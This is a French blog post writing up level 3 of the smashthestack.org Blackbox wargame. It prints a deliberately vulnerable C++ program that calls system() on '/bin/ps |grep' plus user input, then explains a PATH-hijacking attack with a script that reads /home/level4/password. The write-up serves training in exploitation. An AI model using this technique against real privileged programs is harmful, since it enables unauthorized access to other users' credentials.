dimanche 3 octobre 2010

[Wargame] Blackbox at smashthestack.org : level 3 (system)

Passons maintenant au level 3.

Voilà le code de celui-ci :
#include 
#include 

int main(int main, char **argv)
{
 std::string command;
 std::string program;

 std::cout << "Enter the name of the program: ";
 std::cin >> program;

 for(unsigned int i = 0; i < program.length(); i++) {
  if(strchr(";^&|><", program[i]) != NULL) {
   std::cout << "Fatal error" << std::endl;
   return 1;
  }
 }


 // Execute the command to list the programs
 command = "/bin/ps |grep ";
 command += program;
 system(command.c_str());

 return 0;
}
Ici en regardant la commande executée on aurait tendance à penser à une injection de commande Unix de manière directe. Mais plus haut on voit un filtre contre celà. Il nous reste la possibilitée de faire usage de la faille system(), en effet, sous les Unixoides, l'emplacement des exécutables est défini grâce à la variable PATH. Il nous suffit de modifier cette variable et y mettre un script ou programme avec le nom qui va bien. Notre script :
#!/bin/sh

cat /home/level4/password

Il n'y a plus qu'à modifier la variable PATH comme il faut ;).

m_101

Aucun commentaire :

Publier un commentaire